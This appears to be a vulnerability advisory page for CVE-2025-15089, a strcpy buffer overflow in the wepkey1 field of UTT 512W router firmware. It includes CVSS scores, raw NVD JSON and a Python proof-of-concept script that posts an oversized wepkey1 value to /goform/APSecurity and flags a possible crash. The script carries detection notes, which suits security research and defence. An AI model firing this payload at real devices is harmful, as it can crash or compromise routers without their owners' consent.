Security Vulnerability Report
CVE-2025-15089 CVSS 8.8 HIGH

CVE-2025-15089

Published: 2025-12-25 23:15:41
Last Modified: 2025-12-31 18:56:08

Description

A vulnerability has been found in UTT 进取 512W up to 1.7.7-171114. This affects the function strcpy of the file /goform/APSecurity. The manipulation of the argument wepkey1 leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
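CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (the Secondary-source vector; the raw record below also lists a Primary CVSS 3.1 vector with PR:N, base score 9.8 CRITICAL)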

Configurations (Affected Products)

cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
UTT 进取 512W <= 1.7.7-171114

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-15089 PoC - UTT 进取 512W, /goform/APSecurity, wepkey1 parameter.

Issue as described by the advisory: the wepkey1 argument is handled with
strcpy and an overlong value overflows a buffer. Affected firmware: up to
1.7.7-171114. CVSS: 8.8 (High).

What the script does: it sends a single HTTP POST carrying an oversized
wepkey1 value and reports how the HTTP exchange went. It never inspects the
device itself, so its verdict is a heuristic: an error status, a timeout or a
refused connection is reported as a possible crash even when the cause is an
unreachable host or a rejected request, and a normal 200 reply does not show
that a device is unaffected.

Detection note: standard WEP keys are 10 or 26 hex digits (5 or 13 ASCII
characters), so a wepkey1 field thousands of characters long in a POST to
/goform/APSecurity is not legitimate configuration traffic and can be logged
or rejected before it reaches the device.
"""

import requests
import sys


def exploit_buffer_overflow(target_ip, target_port=80):
    """
    Send one oversized wepkey1 value to /goform/APSecurity and report the outcome.

    Args:
        target_ip: Address of the router's web interface.
        target_port: HTTP port of that interface (default: 80).

    Returns:
        True when the reply status is not 200, the request times out, or the
        connection fails (all reported as a possible crash); False when the
        reply status is 200 or any other exception is raised.
    """
    endpoint = f"http://{target_ip}:{target_port}/goform/APSecurity"

    # 2000 filler characters. The advisory text states no buffer size; this
    # length is the PoC author's choice and may behave differently across
    # firmware versions.
    oversized_key = "A" * 2000

    # NOTE(review): the advisory names only wepkey1; the other two fields are
    # carried over from the original PoC and are not confirmed here.
    form_fields = {
        "wepkey1": oversized_key,
        "security_mode": "wep",
        "wepAuthType": "open",
    }

    # The request presents a generic browser User-Agent, so that header is
    # not a useful signal for spotting this traffic.
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    }

    suspected_crash = False
    try:
        print(f"[*] Sending exploit payload to {endpoint}")
        print(f"[*] Payload length: {len(oversized_key)} bytes")

        reply = requests.post(
            endpoint,
            data=form_fields,
            headers=request_headers,
            timeout=10,
        )

        print(f"[+] Response Status: {reply.status_code}")
        print(f"[*] Response Length: {len(reply.text)} bytes")

        # Any status other than 200 is treated as "possibly crashed"; this
        # cannot tell a crash apart from an ordinary error response.
        if reply.status_code != 200:
            print("[!] Device may have crashed or returned error")
            suspected_crash = True
    except requests.exceptions.Timeout:
        # Must stay ahead of ConnectionError: a connect timeout is both.
        print("[!] Request timed out - device may have crashed")
        suspected_crash = True
    except requests.exceptions.ConnectionError:
        print("[!] Connection error - device may be down or crashed")
        suspected_crash = True
    except Exception as e:
        # Anything else is reported and counted as "no crash observed".
        print(f"[!] Error: {str(e)}")

    return suspected_crash


if __name__ == "__main__":
    cli_args = sys.argv

    if len(cli_args) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        print(f"Example: {sys.argv[0]} 192.168.1.1 80")
        sys.exit(1)

    host = cli_args[1]
    # The optional second argument is the HTTP port; it is converted with
    # int() and a non-numeric value raises ValueError before the banner.
    if len(cli_args) > 2:
        http_port = int(cli_args[2])
    else:
        http_port = 80

    banner_rule = "=" * 60
    print(banner_rule)
    print("CVE-2025-15089 PoC - UTT 进取 512W Buffer Overflow")
    print(banner_rule)

    flagged = exploit_buffer_overflow(host, http_port)

    if flagged:
        print("\n[!] Exploit sent - verify device status")
    else:
        print("\n[*] Exploit completed - check results manually")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15089", "sourceIdentifier": "[email protected]", "published": "2025-12-25T23:15:41.093", "lastModified": "2025-12-31T18:56:07.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT 进取 512W up to 1.7.7-171114. This affects the function strcpy of the file /goform/APSecurity. The manipulation of the argument wepkey1 leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:o:utt:512w_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.7-171114", "matchCriteriaId": "962A8F4C-6C57-4682-AF35-16B98ABE7890"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:512w:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "43C0782C-5F34-44B8-9A45-DF3A6121D668"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/new/14.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/new/14.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338418", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338418", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.708348", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}